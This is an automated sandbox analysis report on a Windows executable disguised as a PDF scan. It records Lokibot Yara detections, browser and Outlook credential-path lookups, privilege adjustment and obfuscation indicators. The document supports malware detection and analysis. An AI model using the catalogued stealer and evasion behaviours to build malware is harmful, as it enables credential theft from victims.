Source: scan0098788_pdf.exe, 00000000.00000002.812818039.0000000000F6F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: This is a third-party compiled AutoIt script.2_2_00EE3B4C
Source: scan0098788_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: scan0098788_pdf.exe, 00000002.00000000.783147503.0000000000F6F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Source: scan0098788_pdf.exe, 00000003.00000002.1172299564.0000000000F6F000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
Source: scan0098788_pdf.exe, 00000003.00000002.1172299564.0000000000F6F000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Source: scan0098788_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: scan0098788_pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: scan0098788_pdf.exe
Contains functionality to communicate with device driversShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,2_2_00F4A279
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F38638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00F38638
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F45264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00F45264
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EEE0600_2_00EEE060
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EEE8000_2_00EEE800
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EEFE400_2_00EEFE40
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EF70FE0_2_00EF70FE
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EF68410_2_00EF6841
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EF31900_2_00EF3190
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EF89680_2_00EF8968
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EF41400_2_00EF4140
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F0DAF50_2_00F0DAF5
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE12870_2_00EE1287
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F0CCA10_2_00F0CCA1
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F164520_2_00F16452
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F016040_2_00F01604
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F67E0D0_2_00F67E0D
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F16F360_2_00F16F36
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F0BF260_2_00F0BF26
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EEE0602_2_00EEE060
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EF41402_2_00EF4140
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F023452_2_00F02345
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F604652_2_00F60465
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F164522_2_00F16452
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F125AE2_2_00F125AE
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F0277A2_2_00F0277A
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F608E22_2_00F608E2
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EF68412_2_00EF6841
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EEE8002_2_00EEE800
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F169C42_2_00F169C4
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EF89682_2_00EF8968
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F489322_2_00F48932
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F3E9282_2_00F3E928
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F1890F2_2_00F1890F
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F0CCA12_2_00F0CCA1
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F16F362_2_00F16F36
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EF70FE2_2_00EF70FE
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EF31902_2_00EF3190
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EE12872_2_00EE1287
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F0F3592_2_00F0F359
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F033072_2_00F03307
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EF56802_2_00EF5680
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F016042_2_00F01604
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EF58C02_2_00EF58C0
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F078132_2_00F07813
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F0DAF52_2_00F0DAF5
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F01AF82_2_00F01AF8
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F19C352_2_00F19C35
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EEFE402_2_00EEFE40
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F67E0D2_2_00F67E0D
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F0BF262_2_00F0BF26
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F01F102_2_00F01F10
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_0040549C3_2_0040549C
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_004029D43_2_004029D4
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F11AC0 appears 47 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00EE5A64 appears 32 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F00C63 appears 77 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F0394B appears 38 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F08A80 appears 69 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00F09EF5 appears 35 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 00EE7F41 appears 50 times
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: String function: 0041219C appears 45 times
PE file contains strange resourcesShow sources
Source: scan0098788_pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: scan0098788_pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: scan0098788_pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: scan0098788_pdf.exe, 00000000.00000003.792369623.0000000004F94000.00000004.00000001.sdmpBinary or memory string: FV_ORIGINALFILENAME vs scan0098788_pdf.exe
Source: scan0098788_pdf.exe, 00000000.00000003.795461391.0000000004C05000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameu vs scan0098788_pdf.exe
Source: scan0098788_pdf.exe, 00000000.00000003.795461391.0000000004C05000.00000004.00000001.sdmpBinary or memory string: FV_ORIGINALFILENAME/ vs scan0098788_pdf.exe
Source: scan0098788_pdf.exe, 00000000.00000003.801572759.000000000471D000.00000004.00000001.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs scan0098788_pdf.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Yara signature matchShow sources
Source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.winEXE@5/2@0/1
Contains functionality for error loggingShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F4A0F4 GetLastError,FormatMessageW,0_2_00F4A0F4
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F384F3 AdjustTokenPrivileges,CloseHandle,2_2_00F384F3
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F38AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00F38AA3
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F4B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00F4B3BF
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F43C99 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F43C99
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F584D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,#8,#9,2_2_00F584D0
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00EE4FE9
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-58933367-3072710494-194312298-1002\4216a73197943a17d1161a6bdc4512b0_59407d34-c8c5-44df-a766-ba8a11cb1cb0Jump to behavior
Creates mutexesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeMutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
PE file has an executable .text section and no other executable sectionShow sources
Source: scan0098788_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: scan0098788_pdf.exeReversingLabs: Detection: 41%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\scan0098788_pdf.exe 'C:\Users\user\Desktop\scan0098788_pdf.exe'
Source: unknownProcess created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Source: unknownProcess created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exe
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exeJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess created: C:\Users\user\Desktop\scan0098788_pdf.exe C:\Users\user\Desktop\scan0098788_pdf.exeJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: scan0098788_pdf.exeStatic file information: File size 1560576 > 1048576
PE file contains a mix of data directories often seen in goodwareShow sources
Source: scan0098788_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: scan0098788_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: scan0098788_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: scan0098788_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: scan0098788_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: scan0098788_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
PE file contains a debug data directoryShow sources
Source: scan0098788_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mappingShow sources
Source: scan0098788_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: scan0098788_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: scan0098788_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: scan0098788_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: scan0098788_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Yara detected aPLib compressed binaryShow sources
Source: Yara matchFile source: 00000000.00000003.790188914.0000000005591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.807797640.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.787230238.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785230005.00000000055F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785335673.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.757905408.00000000057D7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1171230305.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.791806641.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.757815096.000000000568C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785273546.000000000562C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.787472385.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.789332429.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.791179991.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.789421483.00000000060B4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.816455062.0000000006A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: scan0098788_pdf.exe PID: 1044, type: MEMORY
Source: Yara matchFile source: Process Memory Space: scan0098788_pdf.exe PID: 4860, type: MEMORY
Source: Yara matchFile source: 0.2.scan0098788_pdf.exe.6a60000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.scan0098788_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.scan0098788_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.scan0098788_pdf.exe.6a60000.1.raw.unpack, type: UNPACKEDPE
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE4C95 LoadLibraryA,GetProcAddress,0_2_00EE4C95
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00F08AC5 push ecx; ret 0_2_00F08AD8
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F08AC5 push ecx; ret 2_2_00F08AD8
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 0_2_00EE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00EE4A35
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00EE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00EE4A35
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F653DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00F653DF
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeCode function: 2_2_00F03307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00F03307
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\scan0098788_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
